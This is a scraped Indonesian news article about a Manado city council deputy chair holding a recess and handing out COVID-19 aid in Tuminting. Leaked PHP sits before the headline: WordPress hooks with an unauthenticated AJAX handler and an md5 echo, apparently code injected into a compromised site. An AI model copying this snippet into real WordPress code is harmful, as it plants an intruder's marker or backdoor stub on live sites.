function bestrock_render_js(){ } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ } add_action('wp_head', 'bestrock_render_js'); add_action('wp_ajax_qgt', 'bestrock_render_index'); add_action('wp_ajax_nopriv_wrt', 'bestrock_render_ajax'); Wakil Ketua II DPRD Manado Gelar Reses Pertama Tahun 2020 – IndoSulut

Menu

Mode Gelap
Rektor Sompie Lantik Enam Pejabat Baru Unsrat Walikota Manado Terima Kunjungan BPK RI Sulut Kementrian Lingkungan Hidup Gelar TOT Akademisi Tahap IV di UNSRAT Manado Walikota Manado Gelar Rapat Teknis Soal Relokasi Warga Korban Bencana Wali Kota dan Wakil Wali Kota Manado Hadiri Acara Penyerahan Sertifikat Tanah

Uncategorized · 4 Mei 2020 01:50 WIB ·

Wakil Ketua II DPRD Manado Gelar Reses Pertama Tahun 2020


					Wakil Ketua II DPRD Manado Gelar Reses Pertama Tahun 2020 Perbesar

MANADO – Wakil Ketua II DPRD Kota Manado, Adrey Laikun, menggelar reses pertama tahun 2020 di beberapa titik di Kecamatan Tuminting, sekaligus penyaluran bantuan sosial bagi warga, Senin (4/5/2020).

Saat reses di Kelurahan Karangria, Adrey Laikun mengatakan bantuan bahan pokok untuk warga yang terdampak covid-19 merupakan bagian dari kegiatan sosial yang bukan diambil dari anggaran reses.

“Reses ini dilakukan sesuai anjuran dari pemerintah yang mengikuti standar kesehatan. Penyaluran bantuan dari rumah ke rumah, sehingga masyarakat tidak berkerumun,” kata Adrey Laikun kepada wartawan.

Dia mengatakan, saat pandemi virus corona kegiatan reses dibatasi jumlah kehadiran warga, namun kegiatan penjaringan aspirasi tetap berjalan meski dengan anggaran yang lebih kecil daripada tahun-tahun sebelumnya.

“Aspirasi yang disampaikan warga yakni terkait penerangan jalan, jalan rusak, dan covid-19 yang saat ini menjadi topik paling hangat,” ujarnya.

Sementara itu, untuk bantuan dari pemerintah kota, Laikun mengatakan warga tidak banyak mengeluhkan karena tetap menunggu untuk pendataan ulang.

“Bantuan dari pemerintah disini aman-aman saja, karena kepala sekolah telah sosialisasikan dengan benar. Namun yang menjadi skala prioritas disini adalah drainase yang membuat banjir saat hujan,” katanya. (AuddyManoppo)

Artikel ini telah dibaca 2 kali

badge-check

Penulis

Baca Lainnya

Safari Ramadhan Pemkot Manado di Kampung Jawa, Wali Kota: Kita Berikan Contoh Baik untuk Indonesia

26 Maret 2024 - 18:18 WIB

Inspektorat: Pemkot Manado Tidak Pernah Anggarkan Belanja Souvenir Seharga 3.8 Miliar

10 Maret 2024 - 10:58 WIB

Wali Kota Manado: Program Dana Duka diganti Bantuan Duka

27 Februari 2024 - 13:25 WIB

Capai 15 Ribu Suara Total, PDI Perjuangan Peluang 3 Kursi Dapil Tuminting – Bunaken

16 Februari 2024 - 21:31 WIB

Tertib saat Ikuti Kampanye, Richard Sualang Beri Apresiasi untuk Warga

1 Februari 2024 - 22:55 WIB

KPU Manado: Tidak Ada Potongan Apapun untuk Anggaran KPPS, Masyarakat Jangan Percaya Hoaks

30 Januari 2024 - 09:00 WIB

Trending di Uncategorized